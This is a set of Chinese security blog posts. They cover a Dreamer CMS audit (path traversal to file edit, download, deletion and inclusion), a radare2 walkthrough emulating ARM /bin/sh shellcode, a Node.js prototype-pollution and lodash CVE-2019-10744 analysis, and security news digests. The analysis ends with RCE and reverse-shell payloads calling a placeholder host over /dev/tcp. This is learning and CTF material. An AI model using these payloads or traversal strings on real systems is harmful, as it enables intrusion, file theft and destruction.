前言 前段时间的比赛将该cms作为了题目考察，这个cms的洞也被大佬们吃的差不多了，自己也就借此机会来浅浅测试下这个cms残余漏洞，并记录下这一整个流程，谨以此记给小白师傅们分享下思路，有错误的地方还望大佬们请以指正。 安装 参考官方文档，给出了很详细的安装说明，如安装遇到问题，可到官方论坛寻找解决方法，常见安装失败问题都有。 https://gitee.com/iteachyou/dreamer_cms#https://gitee.com/link?target=https%3A%2F%2Fwww.iteachyou.cc%2Farticle%2F55ec2939c29147eca5bebabf19621655该cms项目是基于springboot框架开发的，安装的时候需要的环境为 springboot+redis+mysql+ IDEA 配置文件主要是这两个application-prd.yml和application-dev.yml，需要配置好mysql数据库连接、redis连接以及网页静态资源路径，其余的安装上面的一步步安装即可。 安装成功后访问登陆页面 管理员账号密码已经给了，直接登录。 漏洞测试 风格管理模板存在任意编辑文件实现命令执行 经测试，发现后台风格管理模板上传主题压缩包时可以进行污染压缩包theme.json文件，达到目录穿越到服务器敏感目录，从而在模板管理在解析时没有进行检测可以任意编辑系统敏感文件导致GetShell，控制服务器权限。 漏洞产生的主要文件：主题上传Controller文件：src/main/java/cc/iteachyou/cms/controller/admin/ThemesController.java， 找到add方法。 首先是判断文件是否存在以及JSON解析是否正确；判断Key是否都存在；判断对应值是否为空；创建theme对象；判断设置路径是否已"default"开头。最后校验主题包各种配置是否正确。确认的话就成功上传。 但是没有对themePath路径问题进行检测，便可构造目录穿越，这也是该漏洞造成的关键原因。 最后是判断上传的压缩包里的各类信息无误后进入处理保存文件逻辑的save方法。 在上传的主题包里的\dreamer\dreamer-cms\templates\default_v3\theme.json文件，将目录穿越的构造替换主题包路径，更改之后theme.json文件内容如下： { "themeName":"新版主题", "themeImage":"http://localhost:8888/resource/img/dreamercms-logo.png", "themeAuthor":"", "themePath":"../../../../../../../../../../../../../../"//此路径要和模板文件夹的名称一致 } 虽然有检测，但是在之前themeDir已经被污染了，所以相当于检测相当于没有。接着检查是否有权限，startwith方法也没有问题。 `` 最后就是保存文件。到此时后台模板已被刚刚传入的构造污染，可以进行利用，效果如下： 将修改后的主题包上传 风格页面会多出一个新的主题 点击启用。然后查看模板管理页面，发现目录穿越成功，成功进入服务器的根目录，这时就相当于在自己服务器上编辑修改文件。 测试文件为/home/www 目录下的1.txt文件，原本是空文件。 在页面修改该文件，添加内容 然后保存，再到服务器里查看，成功将内容加入。 如果修改authorized_key文件便可进行免密登录，利用压缩校验不正确从而上传任意危险文件，例如一句话木马等来获取系统权限；还可以获取系统passwd文件获取敏感信息，也可以写计划任务进行命令执行。 该漏洞分析到此为止，接着是附件管理模板可以进行任意文件下载、删除。 # 附件管理模板可以进行任意文件下载、删除。 漏洞产生主要文件： src/main/java/cc/iteachyou/cms/controller/admin/AttachmentController.java添加附件功能的代码如下： 首先肯定是先添加附件，这里没有对attachment参数进行过滤。导致保存附件的时候目录穿越的构造就被保留了下来，对其进行解析后就可以将服务器的指定文件随意下载、删除，从而对服务器构成威胁。 下载、删除功能的代码都在同一个文件，都是通过刚刚的attachment参数，然后使用attachment.getFilepath()获取服务器文件路径，对其进行解析。 先看下载功能的代码： 这里也没有对 filePath变量进行过滤，所以总的来说就是添加附件和下载附件的两处代码，都没有对相应的变量进行检测过滤，从而导致漏洞产生。 删除功能的代码： 删除的话就没什么好说的，和上面一样的原理，试想下，如果可以任意删除服务器的配置文件，那不就相当于服务器要崩的节奏。 漏洞演示如下： 还是利用刚刚/home/www目录下的1.txt文件 在添加附件模块先随便上传一个本地文件（这里随便上传了一个theme.txt文件） burpsuite抓包如下 需要改的就是这个filepath参数对应的文件路径，将其修改为 ../../../../../../../../../../../../../home/www/1.txt 然后放包。 刷新页面，观察到多了一个theme.txt文件，下载下来并打开内容如下： 服务器里的/home/www/1.txt里的内容193840sswwloP 已成功写入本地theme.txt文件，任意下载文件成功。 删除效果，点击右边的删除。 发现该1.txt文件被删除了，任意删除文件成功。 # 模板管理存在任意文件包含 产生漏洞的主要文件：src/main/java/cc/iteachyou/cms/taglib/tags/IncludeTag.java If语句只是简单判断值是否为空，但是没有检测过滤字符，导致可以传入目录穿越的构造../../../../../../../../../../../../../home/www/1.txt进行文件包含，读取里面内容。接着在模板管理找到index_about.html 将../../../../../../../../../../../../../home/www/1.txt写入div标签并保存，如下图 接着访问主页里的关于我们： 可以看到，成功进行了文件包含，如将构造/home/www/1.txt换成/etc/passwd这类敏感文件，则被攻击者获取到关键信息，这里也测试下：修改构造 页面如期输出/etc/passwd文件里的信息。 总结 本文测试是在该cms旧版本上进行的，新版本对已有问题已进行了修复，这次对该java实现的cms漏洞挖掘收获满满，对cms安装、部署以及代码审计中要注意的点得到了良好的锻炼。

1、新型Android恶意软件FluHorse窃取密码和2FA代码 https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/ 在Check Point Research进行的最新研究中，研究人员发现了一种新发现的名为FluHorse的恶意软件。该恶意软件具有多个模仿合法应用程序的恶意Android应用程序，其中大多数安装量超过1000000次。这些恶意应用程序会窃取受害者的凭据和双因素身份验证 (2FA) 代码。FluHorse针对东亚市场的不同领域并通过电子邮件进行分发。在某些情况下，攻击第一阶段使用的电子邮件属于知名实体。恶意软件可能几个月都未被发现使其成为一 2、ALPHV团伙声称对Constellation Software进行了勒索软件攻击 https://www.bleepingcomputer.com/news/security/alphv-gang-claims-ransomware-attack-on-constellation-software/ 加拿大多元化软件公司Constellation Software证实，其部分系统遭到威胁行为者的破坏，他们还窃取了个人信息和商业数据。该公司表示：“该事件仅限于Constellation运营集团和业务与内部财务报告和相关数据存储相关的少数系统。”Constellation表示，它已经遏制了这次攻击，现在已经恢复了所有受事件影响的IT基础设施系统。这家加拿大公司在北美、欧洲、澳 3、WordPress自定义字段插件漏洞导致超过100万个站点遭受XSS攻击 https://www.bleepingcomputer.com/news/security/wordpress-custom-field-plugin-bug-exposes-over-1m-sites-to-xss-attacks/ 安全研究人员警告说，“高级自定义字段”和“高级自定义字段专业版”WordPress插件安装数百万次，容易受到跨站点脚本攻击(XSS)。这两个插件是WordPress最受欢迎的自定义字段构建器之一，在全球站点上有2000000个活跃安装。Patchstack的研究员Rafie Muhammad于2023年5月2日发现了高危反射型XSS漏洞，该漏洞的编号为CVE 4、Apple为iOS/iPadOS/macOS用户发布首个快速安全响应补丁 https://www.malwarebytes.com/blog/news/2023/05/apple-releases-first-rapid-security-response-update-for-ios-ipados-and-macos-users 苹果发布了第一批快速安全响应（RSR）补丁，分别适用于iPhone和iPad以及macOS设备的iOS 16.4.1（a）、iPadOS 16.4.1（b）和macOS 13.3.1（a）。RSR是一种新型的软件补丁，在苹果公司的定期软件更新之间提供。此前，苹果的安全修复与功能和改进捆绑在一起，但RSR只提供安全修复。它们旨在使安全改进 5、研究人员发现Microsoft Azure API管理服务中的3个漏洞 https://thehackernews.com/2023/05/researchers-discover-3-vulnerabilities.html Microsoft Azure API 管理服务中披露了三个新的安全漏洞，恶意行为者可能会滥用这些漏洞来访问敏感信息或后端服务。据以色列云安全公司Ermetic称，这包括两个服务器端请求伪造(SSRF)漏洞和一个API管理开发人员门户中的无限制文件上传功能实例。“通过滥用SSRF漏洞，攻击者可以从服务的CORS代理和托管代理本身发送请求，访问内部Azure资产，拒绝服务并绕过Web应用程序防火墙，”安全研究员Liv Matan在与黑客新闻 6、CISA敦促组织审查FCC的高风险通信设备清单 https://securityboulevard.com/2023/05/cisa-urges-organizations-to-review-fccs-list-of-high-risk-communications-equipment/ 网络安全和基础设施安全局（CISA）最近发布了一份咨询意见，敦促各组织审查联邦通信委员会（FCC）的通信设备和服务清单，美国政府认为这些设备和服务对国家安全构成了不可接受的风险。这一行动旨在保护国家关键基础设施供应链免受网络威胁。CISA敦促所有关键基础设施所有者和运营商采取必要措施，以保护该国最关键的供应链。该机构呼吁组织将涵盖的清单纳入其供应链风险 7、严重的西门子 RTU 漏洞可能允许黑客破坏电网 https://www.securityweek.com/critical-siemens-rtu-vulnerability-could-allow-hackers-to-destabilize-power-grid/ 西门子最近修补了一个影响其部分能源 ICS 设备的严重漏洞，该漏洞可能允许黑客破坏电网的稳定。 8、Twitter称由于安全事件导致私人Circle推文对外暴露 https://www.bleepingcomputer.com/news/security/twitter-says-security-incident-exposed-private-circle-tweets/ Twitter透露，“安全事件”导致发送到Twitter Circles的私人推文向Circle以外的用户公开显示。Twitter Circle是2022年8月发布的一项功能，允许用户向一小部分人发送推文，并承诺对公众保密。通过阅读Twitter对隐私功能的描述，发现Twitter Circle是一种向选定的人发送推文并与较小的人群分享想法的方式。Twitter在近期发送的安全 9、FBI 查封电子书网站 Z-Library 使用的其他域名 https://securityaffairs.com/145854/cyber-crime/z-library-domains-seized.html FBI 再次查封 Z-Library，当局没收了该服务使用的几个域。 10、谷歌推出网络安全职业证书计划 https://www.darkreading.com/careers-and-people/google-now-offers-cybersecurity-career-certificate-program 谷歌增加了一项新的认证计划，旨在根据其现有的谷歌职业证书计划培训新一代网络安全专业人员。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

当我们在编写汇编时，可能有的时候你需要看看编译器中到底发生了什么。如果你正在排除shellcode出现的问题，你那么更需要耐心地、慎重地运行指令。 本文将探讨如何在x86_64的Ubuntu系统上模拟32位ARM shellcode。由于大多数笔记本电脑和工作站还没有运行ARM，我们这里需要一种其他方法在系统上执行非原生的指令。另外，原始的shellcode二进制文件并不是可执行文件格式，并不能被大多数工具所运行，所以我们需要一种其他的方法来执行这些文件。 在这里我们使用的是Radare2， Radare2是一个控制台驱动的框架，集成了一套简便易用的二进制分析工具。你可以把这些工具编写成脚本，或者使用交互式的命令行界面。要在Ubuntu上设置这个，我们只需要几个简单的命令。 mkdir ~/github cd ~/github git clone https://github.com/radareorg/radare2.git cd radare2 sys/install.sh 如果你已经安装了radare2，请确保你目前运行的是最新版本。这个工具一直在积极维护并定期进行更新。另外，在2022年6月的版本之前有一些错误，使得此次试验可能无法更好的完成。 cd ~/github/radare2 git pull sys/install.sh r2 -V 为了复制我们将在本文中使用的shellcode二进制文件，你可以在bash提示符下运行以下内容： nemo@hammerhead:~$ echo -n -e '\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x00' > shellcode-696.bin nemo@hammerhead:~$ md5sum shellcode-696.bin 42ba1c77446594cac3508b940926575d shellcode-696.bin ESIL简介 可评估字符串中间语言（ESIL）是radare2使用的一种从硬件中抽象出来的指令，可以在不考虑底层硬件的情况下，来 "执行" 机器指令。这对于在仿真环境中执行非本地的汇编指令是非常理想的。 为了使用ESIL来执行我们的shellcode，我们需要做以下工作： 加载我们的shellcode二进制文件 配置radare2，使其知道如何正确解释我们的shellcode二进制文件 初始化ESIL 根据需要设置寄存器 通过我们的汇编指令来验证其功能 用 ESIL 执行ARM shellcode 加载我们的shellcode二进制文件 当我们对shellcode二进制文件运行 "file"命令时，我们看到Linux不能确定其文件格式。同样地，radare2也不能确定它是什么。 nemo@hammerhead:~/labs/shellcode/asm$ file shellcode-696.bin shellcode-696.bin: data 由于它只是一个二进制的文件，我们需要把它加载到radare2中后指定我们要看的是什么。在这里，我们修改了一些软件的分析设置，以便我们能够正确地分析我们的ARM文件： nemo@hammerhead:~/labs/shellcode/asm$ r2 shellcode-696.bin [0x00000000]> e anal.arch = arm [0x00000000]> e asm.arch = arm [0x00000000]> e asm.bits = 32 [0x00000000]> e anal.armthumb=true 配置radare2，使其知道如何正确运行我们的shellcode二进制文件 接下来我们要指定哪些指令是ARM，哪些是THUMB。我发现要做到这一点，就需要定义指令类型改变的函数。在这个特定的shellcode中，它会在ARM和THUMB指令之间进行切换。 [0x00000000]> af [0x00000000]> pdf ┌ 8: fcn.00000000 (); │ rg: 0 (vars 0, args 0) │ bp: 0 (vars 0, args 0) │ sp: 0 (vars 0, args 0) │           0x00000000     01308fe2       add r3, pc, 1 └           0x00000004     13ff2fe1       bx r3 在这个radare2命令的片段中，我正在分析一个地址为0的函数。在这里并不存在一个真正的函数，但是我们这样做是为了让我们的"函数"可以指定为ARM或者THUMB。"pdf "命令只是打印了函数的反汇编指令，这其中包含了add和bx指令。 <p>[0x00000000]> s 8 [0x00000008]> af [0x00000008]> pdf ┌ 24: fcn.00000008 (int32_t arg1, int32_t arg2); │           ; arg int32_t arg1 @ r0 │           ; arg int32_t arg2 @ r1 │           0x00000008     78460c30       andlo r4, ip, r8, ror r6 │           0x0000000c     c0460190       andls r4, r1, r0, asr 13   ; arg2 │       ┌─< 0x00000010     491a921a       bne 0xfe48693c │       │   0x00000014     0b2701df       svcle 0x1270b │       │   0x00000018     2f62696e       cdpvs p2, 6, c6, c9, c15, 1 └       │   0x0000001c     2f736800       rsbeq r7, r8, pc, lsr 6 [0x00000008]> afB 16</p> 从地址8开始的下一组指令是THUMB指令。"s 8 " 指令会在文件中寻找8个字节，并跳转到一个我们希望到达的地方，然后定义下一个 "函数"。用 "af "创建函数后，当我们试图用 "pdf "显示它时，它看起来有点古怪。这是因为工具仍然会将这些指令解释为ARM。 我们可以通过设置比特数为16来指定这个 "函数 " 是THUMB。也就是将asm.bits设置为16，不过只针对这个函数生效。在一个正常的ARM二进制文件中，radare2会尝试自动进行这种区分，但是由于我们只有这一串shellcode指令，我们仍然需要进行手动区分。 注意我们可以删掉前两条指令并使用全THUMB的shellcode。如果我们这样做，我们就可以在打开文件时设置 "e asm.bits=16"，而不必再重新定义函数。只不过，如果需要的话，你可以区分这两种指令类型。 Radare2还有一个更方便的方法，就是用 "izz "命令显示二进制文件中的所有字符串。 > izz [Strings] nth paddr     vaddr     len size section type string ――――――――――――――――――――――――――――――――――――――――――――――――――――――― 0   0x00000008 0x00000008 4   5           ascii xF\f0 1   0x00000018 0x00000018 7   8           ascii /bin/sh</p> 现在我们已经能够正确的加载我们的shellcode二进制文件了。 初始化ESIL 如前所述，radare2内置了很多命令，在命令前缀中加入"？" 可以列出所有相关的命令。"ae? " 命令将列出与ESIL和仿真相关的命令。 [0x00000000]> ae? Usage: ae[idesr?] [arg] ESIL code emulation | ae [expr]               evaluate ESIL expression | ae?                     show this help | ae??                     show ESIL help | aea[f] [count]           analyse n esil instructions accesses (regs, mem..) | aeA[f] [count]           analyse n bytes for their esil accesses (regs, mem..) | aeb ([addr])             emulate block in current or given address | aeC[arg0 arg1..] @ addr appcall in esil | aec[?]                   continue until ^C | aef [addr]               emulate function | aefa [addr]             emulate function to find out args in given or current offset | aeg [expr]               esil data flow graph | aegf [expr] [register]   esil data flow graph filter | aei[?]                   initialize ESIL VM state (aei- to deinitialize) | aek[?] [query]           perform sdb query on ESIL.info | aeL                     list ESIL plugins | aep[?] [addr]           manage esil pin hooks (see “e cmd.esil.pin”) | aepc [addr]             change esil PC to this address | aer[?] [..]             handle ESIL registers like “ar” or “dr” does | aes[?]                   perform emulated debugger step | aets[?]                 esil Trace session | aev [esil]       visual esil debugger for the given expression or current instruction | aex [hex]               evaluate opcode expression 在这里，我们首先需要用 "aei "命令来初始化ESIL。之后，我们需要初始化一个堆栈。Radare2会自动选择一个堆栈的位置，不过这也可以使用"aeim "命令参数来指定地址 。 [0x00000008]> aei [0x00000008]> aeim 根据需要设置寄存器 由于我们的shellcode指令是从0开始的，我们需要用 "aepc 0 "命令将我们的程序计数器（PC）设置为0。如果我们想在偏移量0以外的位置开始执行，我们可以用 "aepc <address>"来设置起始地址。 [0x00000008]> aepc 0 我们的shellcode中的一条指令（"subs r1, r1, r1"）会将r1设置为0.由于这个寄存器默认已经为0，让我们将它设置为0xffff，这样我们就可以看到当我们在shellcode中步进时所发生的变化。要做到这一点，我们需要使用 "aer "命令。 [0x00000008]> aer r1 = 0xffff 通过我们的设置来验证其功能 好了，现在我们已经设置好了。我们可以切换到可视化模式，进入到调试器面板。在可视模式下有多个选项（面板），所以我们需要敲两次 "p "来进入正确的面板。如果你想在任何时候退出可视化模式，只需按下escape键。你也可以按"？"来查看可用的命令列表。 [0x00000008]> V (hit “p” twice to get to the debugger panel) 然后你会注意到靠近顶部有一组寄存器。它看起来会像这样： 通常在控制台输入的任何r2命令也可以在视觉模式下输入。例如，如果我们想打印偏移量为0x18的字符串，我们需要执行以下命令： # Hit “:” while in visual mode. > ps @0x18 /bin/sh > # Hit enter on a blank line to return to visual mode. 现在，我们可以通过使用"s "键来执行汇编指令。当你在浏览时，你会注意到顶部的寄存器与堆栈数据会一起被更新（在第一张图片中从0x00178000开始）。你还会注意到，下一条要执行的指令（又称PC）的地址在汇编指令中被突出显示（第一幅图中的0x00000010）。 注意，上面的图片显示r1寄存器持有0x0000ffff。还注意到下一条指令将会被执行，即 "subs r1, r1, r1"。这条指令将会从自身减去r1，并将其存回r1，本质上是使其变为0。 再次按 "s "键，进入下一条指令。 现在一切都准备好了，可以通过 "svc 1 "指令通过守护进程调用了。我们现在正在进行 "execve "调用，所以我们应该在r7寄存器中设置0xb。r0中的第一个参数应该是一个指向我们要执行的二进制文件路径的指针。我们可以发现r0持有0x18。我们可以通过运行以下命令来验证它的指向： # Hit “:” while at the “svc 1” instruction in visual mode. > ps @r0 /bin/sh > 现在我们没有向"/bin/sh "传递任何参数，也没有设置任何环境变量，因此我们可以发现r1和r2都被设置为0。 由于我们不是在ARM系统上运行，所以我们不能正确地使用守护进程调用（"svc 1"）指令。当你在测试更复杂的shellcode时，请牢记这一点。 总结 无论您是对自定义的shellcode进行故障排除，还是验证您所看到的静态内容，有时您只需要看看指令到底在做什么。Radare2允许您从一个未知的文件格式（如shellcode二进制文件或固件镜像）加载非本地汇编文件，并一步一步地执行指令。

1、Facebook发现一种名为“NodeStealer”的新型信息窃取恶意软件 https://www.bleepingcomputer.com/news/security/facebook-disrupts-new-nodestealer-information-stealing-malware/ Facebook在Meta上发现了一种名为“NodeStealer”的新型信息窃取恶意软件，它允许威胁行为者窃取浏览器cookie以劫持平台上的账户，以及Gmail和Outlook账户。捕获包含有效用户会话令牌的cookie是一种在网络犯罪分子中越来越流行的策略，因为它允许他们劫持帐户而无需窃取凭据或与目标交互，同时还可以绕过双因素身份验证保护。正如Facebook的安全团 2、研究人员在GooglePlay上发现名为"Fleckpe"的新型Android恶意软件 https://securelist.com/fleckpe-a-new-family-of-trojan-subscribers-on-google-play/109643/ 研究人员在官方Android应用程序商店Google Play上发现了一种名为“Fleckpe”的新型Android订阅恶意软件，它伪装成合法应用程序，下载次数超过620000次。卡巴斯基透露，Fleckpe是恶意软件领域的最新成员，它通过为用户订阅高级服务而产生未经授权的费用。威胁行为者通过收取通过高级服务产生的每月或一次性订阅费用的份额，从未经授权的订阅中获利。当威胁行为者运营服务时，他们会保留全部收入。卡巴斯基 3、思科披露了一个易受RCE攻击的Cisco电话适配器漏洞 https://www.bleepingcomputer.com/news/security/cisco-phone-adapters-vulnerable-to-rce-attacks-no-fix-available/ 思科披露了Cisco电话适配器基于Web的管理界面中的一个漏洞，允许未经身份验证的远程攻击者在设备上执行任意代码。该漏洞编号为CVE-2023-20126，CVSS评分为9.8，是由于固件升级功能中缺少身份验证过程造成的。这些电话适配器是业界流行的选择，无需升级即可将模拟电话集成到VoIP网络中。虽然这些适配器可能在许多组织中使用，但它们可能不会暴露在Internet上， 4、FBI查封了9家给勒索软件团伙提供洗钱服务的加密货币交易所 https://www.bleepingcomputer.com/news/security/fbi-seizes-9-crypto-exchanges-used-to-launder-ransomware-payments/ 美国联邦调查局和乌克兰警方查封了9个加密货币交易网站，这些网站为包括勒索软件参与者在内的诈骗者和网络犯罪分子洗钱提供了便利。查获的网站允许用户匿名将加密货币转换为更难追踪的硬币，以掩盖资金追踪，并帮助网络犯罪分子在不被执法部门追踪的情况下洗钱。这些平台中的大多数为用户提供俄语和英语的实时支持和说明，涵盖广泛的网络犯罪社区。通过提供这些服务，虚拟货币交易所故意支持其客户 5、高通违规获取用户隐私信息，一直在秘密收集私人用户数据 https://cybernews.com/news/android-phone-chip-collecting-user-data/ 据称，芯片巨头高通公司一直在秘密收集私人用户数据，大约三分之一的安卓设备使用了高通制造的芯片，包括三星和苹果智能手机。 6、 Android 更新修补了40多个漏洞，包括用于提权的CVE-2023-0266 https://www.securityweek.com/android-security-update-patches-kernel-vulnerability-exploited-by-spyware-vendor/ 谷歌最新的 Android 安全更新修补了 40 多个漏洞，包括 CVE-2023-0266，这是一个被恶意软件用作零日漏洞的内核漏洞。 7、Rockstar Games遭黑客攻击，GTA 6 源代码被盗 https://www.securityweek.com/gta-6-videos-and-source-code-stolen-rockstar-games-hack/ 视频游戏发行商 Rockstar Games 似乎遭受了数据泄露，黑客声称窃取了即将推出的侠盗猎车手 (GTA) 6 游戏的源代码。 8、Apple 首次为 Beats、AirPods 耳机发布安全更新 https://www.securityweek.com/apple-releases-first-ever-security-updates-for-beats-airpods-headphones/ Apple 为其 Beats 和 AirPods 产品发布了有史以来的第一个安全更新，以修补可被利用通过蓝牙攻击获取耳机访问权限的漏洞。 9、亲俄黑客组织 NoName 关闭了多个法国网站，包括法参议院网站 https://securityaffairs.com/145813/hacktivism/noname-ddos-french-senate.html 法国参议院的网站因亲俄黑客组织 NoName 发起的 DDoS 攻击而下线。亲俄黑客组织 NoName 声称对导致法国参议院网站离线的 DDoS 攻击负责 10、研究人员披露 PaperCut 漏洞新的利用方法，可以绕过所有当前检测 https://securityaffairs.com/145752/hacking/papercut-new-exploit.html VulnCheck 研究人员针对最近披露的 PaperCut 服务器中的一个严重缺陷设计了一种新的利用方法，可以绕过所有当前检测。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1.JS原型和继承机制 0> 原型及其搜索机制 NodeJS原型机制，比较官方的定义： 我们创建的每个函数都有一个 prototype（原型）属性，这个属性是一个指针，指向一个对象， 而这个对象的用途是包含可以由特定类型的所有实例共享的属性和方法 设计原型的初衷无非是对于每个实例对象，其拥有的共同属性没必要对每个对象实例再分配一片内存来存放这个属性。而可以上升到所有对象共享这个属性，而这个属性的实体在内存中也仅仅只有一份。 而原型机制恰好满足这种需求。 打个不太恰当的比喻，对于每个对象，都有其原型对象作为共享仓库，共享仓库中有属性和方法供生产每个对象实例时使用 1> 原型链和继承 原型链 原型链是在原型上实现继承的一种形式 举个例子: function Father(){    this.name = "father";    this.age = 66; } function Son(){    this.name = "son"; } var father1 = new Father(); Son.prototype = father1; var son1 = new Son(); console.log(son1); console.log(son1.__proto__); console.log(son1.__proto__.__proto__); console.log(son1.__proto__.__proto__.__proto__); console.log(son1.__proto__.__proto__.__proto__.__proto__); /* Father { name: 'son' } Father { name: 'father', age: 66 } {} [Object: null prototype] {}       null */ 整个的原型继承链如下： 关于原型搜索机制： 1）搜索当前实例属性 2）搜索当前实例的原型属性 3）迭代搜索直至null 在上面的例子中 console.log(son1.name); console.log(son1.age); /* son 66 */ 2> 内置对象的原型 这个也是多级原型链污染的基础 拿一张业内很经典的图来看看 2.姿势利用 1>利用原型污染进行RCE global.process.mainModule.constructor._load('child_process').execSync('calc') 2>多级污染 在ctfshow Web340中有这么一题： /* login.js */  var user = new function(){    this.userinfo = new function(){    this.isVIP = false;    this.isAdmin = false;    this.isAuthor = false;       }; }  utils.copy(user.userinfo,req.body);  if(user.userinfo.isAdmin){   res.end(flag); } 由于Function原型对象的原型也是Object的原型，即 user --(__proto__)--> Function.prototype --(__proto__)--> Object.prototype 那么就可以通过这个进行多级污染，payload为如下形式： {    "__proto__":{        "__proto__":{            attack_code       }   } } 3>Lodash模块的原型链污染（以lodash.defaultsDeep（CVE-2019-10744）为例，进行CVE复现） lodash版本 < 4.17.12 CVE-2019-10744：在低版本中的lodash.defaultDeep函数中，Object对象可以被原型链污染，从而可以配合其他漏洞。 看下官方样例PoC的调试过程： const lodash = require('lodash'); const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}' function check() {    lodash.defaultsDeep({}, JSON.parse(payload));    if (({})['whoami'] === "hack") {        console.log(`Vulnerable to Prototype Pollution via ${payload}`);        console.log(Object.prototype);   } } check(); 开始调试： 在lodash中，baseRest是一个辅助函数，用于帮助创建一个接受可变数量参数的函数。 所以主体逻辑为，而这段匿名函数也将为func的函数的函数体 args.push(undefined, customDefaultsMerge); return apply(mergeWith, undefined, args); 查看overRest 在变量监听中可以发现，传入的参数整合成一个参数对象args 继续往下return apply 到apply后进入，是个使用switch并且根据参数个数作为依据 发现使用了call，这里可能是个进行原型链继承的可利用点。 (而这种技术称为借用构造函数，其思想就是通过子类构造函数中调用超类构造函数完成原型链继承) function Super(){} function Sub(){    Super.call(this); // 继承 } 然后apply中返回至刚才的匿名函数体中（此时刚执行完baseRest(func)）,其中customDefaultMerge为merge的声明方式 继续深入，由上可知apply(func=mergeWith,thisArg=undefined,args=Array[4]) 基于start的计算机制，不难得知undefined是作为占位符，使得start向后移动 继续调试，在NodeJS中，普通函数中调用this等同于调用全局对象global 将assigner视为合并的一个黑盒函数即可，至此完成原型链污染。 Question: 注意到PoC中的lodash.defaultsDeep({}, JSON.parse(payload));是要求先传入一个object实例的(此处为{}) 所以还是具体分析一下合并的过程(来看下assigner的一些底层实现) 注意：通常而言，合并需要考虑深浅拷贝的问题 /*baseMerge*/    function baseMerge(object, source, srcIndex, customizer, stack) {      if (object === source) { // 优化判断是否为同一对象，是则直接返回        return;     }                // 遍历source的属性，选择深浅复制              baseFor(source, function(srcValue, key) {        if (isObject(srcValue)) {          stack || (stack = new Stack);          baseMergeDeep(object, source, key, srcIndex, baseMerge, customizer, stack);       }        else {          var newValue = customizer            ? customizer(safeGet(object, key), srcValue, (key + ''), object, source, stack)           : undefined;          if (newValue === undefined) {            newValue = srcValue;         }          assignMergeValue(object, key, newValue);       }     }, keysIn);   }    var baseFor = createBaseFor();    function createBaseFor(fromRight) { // fromRight选择从哪端开始遍历      return function(object, iteratee, keysFunc) {        var index = -1,            iterable = Object(object),            props = keysFunc(object),            length = props.length;        while (length--) {          var key = props[fromRight ? length : ++index];          if (iteratee(iterable[key], key, iterable) === false) { // 这里的iteratee即为baseFor中的匿名函数            break;         }       }        return object;     };   } 那我就再调试一下，在iteratee中（即匿名函数中），若为对象，则选择深拷贝。 原来在4.17.12之前的版本也是有waf的，只是比较弱。 回归正题，在customizer之后便产生了合并 所以，为了更好地观察，我将{}替换成[](Array对象实例) 重新开始调试到此处并进入，发现这是一个迭代合并的过程，先判断是否都为对象。如果是的话，则会进行压栈然后开始浅拷贝合并。 这是在生成属性时需要设置的四种数据属性 回归正题，发现只能写入Array的原型 再验证一下 const lodash = require('lodash'); const payload = '{"constructor": {"prototype": {"whoami": "hack"}}}' var object = new Object(); function check() {    // JSON.parse(payload)之后是一个JS对象    lodash.defaultsDeep([],JSON.parse(payload));    if (({})['whoami'] === "hack") {        console.log(`Vulnerable to Prototype Pollution via ${payload}`);        console.log(Object.prototype);   } } check(); console.log(Array.prototype); 所以说需要直接传入一个Object的实例。 官方修复，直接上waf：检测JSON中的payload中的key值 此处对比一下lodash4.17.12之前的版本，key值过滤得更为严格 总结一下，CVE-2019-10744可用的payload # 反弹shell {"constructor":{"prototype": {"outputFunctionName":"a=1;process.mainModule.require('child_process').exec('bash -c \"echo $FLAG>/dev/tcp/vps/port \"')//"}}} # RCE // 对于某个object实例 {"__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"}} # 反弹shell {"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/vps/port 0>&1\"');var __tmp2"}}

1、ScarCruft组织使用大型LNK文件传递RokRAT恶意软件 https://securityaffairs.com/145622/apt/scarcruft-apt-new-infection-chains.html Check Point研究人员报告说，自2022年以来，在与朝鲜相关的ScarCruft APT组织（又名APT37，Reaper和Group123）的攻击中观察到的感染链已停止严重依赖恶意文档来传递恶意软件，而是开始使用嵌入恶意负载的超大LNK文件。ScarCruft至少自2012年以来一直活跃，它在2018年2月初成为头条新闻，当时研究人员透露，APT组织利用Adobe Flash Player中的零日漏洞向韩国用户提供恶意软件。 2、撞库攻击泄露了美联航医疗保健会员数据 https://www.hipaajournal.com/credential-stuffing-attack-exposed-united-healthcare-member-data/ 联合医疗保健（UHC）已开始通知某些成员，由于UHC移动应用程序上的撞库攻击，他们的一些受保护的健康信息可能已泄露给未经授权的个人。撞库是一种攻击，其中一个平台的违规行为中获得的用户名和密码组合用于访问不相关平台上的帐户。只有当用户名和密码在多个平台上重复使用时，这些攻击才能成功。受到未经授权的访问的帐户包括姓名，出生日期，地址，健康保险会员ID号，服务日期，提供者名称，索赔详细信息以及组名称和编号等信息 3、Oracle Opera漏洞(CVE-2023-21932)可能会给连锁酒店带来麻烦 https://www.helpnetsecurity.com/2023/05/02/cve-2023-21932/ 研究人员警告说，Oracle Opera（一种广泛用于大型酒店和度假村连锁酒店的物业管理系统）中最近修补的一个漏洞（CVE-2023-21932）比甲骨文所说的更为严重，并且可能很容易被未经身份验证的远程攻击者利用来访问敏感信息。更重要的是，这些系统经常暴露在互联网上，并不难找到。根据研究人员的说法，可以在Shodan上检索到它们，并且他发现的每一个系统都没有打补丁。 4、德国IT提供商Bitmarck遭受网络攻击 https://securityaffairs.com/145568/hacking/bitmarck-cyberattack.html 